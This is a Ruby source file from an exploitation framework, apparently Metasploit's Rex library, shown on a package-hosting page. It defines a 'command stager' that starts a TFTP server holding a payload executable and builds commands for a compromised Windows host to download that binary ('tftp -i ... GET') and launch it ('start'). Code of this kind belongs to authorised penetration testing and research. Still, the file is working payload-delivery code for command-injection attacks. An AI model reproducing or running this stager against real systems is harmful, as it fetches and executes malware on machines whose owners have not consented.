Sha256: 56ff794eedb2fbd72b02e49365b74d94ca457caaf61ea95be793d76262bd6fa6
Contents?: true
Size: 1.85 KB
Versions: 7
Compression:
Stored size: 1.85 KB
Contents
# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'
module Rex
module Exploitation
###
#
# This class provides the ability to create a sequence of commands from an executable.
# When this sequence is ran via command injection or a shell, the resulting exe will
# be written to disk and executed.
#
# This particular version uses tftp.exe to download a binary from the specified
# server. The original file is preserve, not encoded at all, and so this version
# is significantly simpler than other methods.
#
# Requires: tftp.exe, outbound udp connectivity to a tftp server
#
# Written by Joshua J. Drake
#
###
class CmdStagerTFTP < CmdStagerBase
def initialize(exe)
super
@payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end
def setup(mod)
tftp = Rex::Proto::TFTP::Server.new
tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
tftp.start
mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end
def teardown(mod = nil)
tftp.stop
end
#
# We override compress commands just to stick in a few extra commands
# last second..
#
def compress_commands(cmds, opts)
# Initiate the download
cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"
# Make it all happen
cmds << "start #{@tempdir + @payload_exe}"
# Clean up after unless requested not to..
if (not opts[:nodelete])
# XXX: We won't be able to delete the payload while it is running..
end
super
end
# NOTE: We don't use a concatenation operator here since we only have a couple commands.
# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
# the start command being issued separately so that it can ignore it :)
attr_reader :exe
attr_reader :payload_exe
attr_accessor :tftp
end
end
end
Version data entries
7 entries across 7 versions & 3 rubygems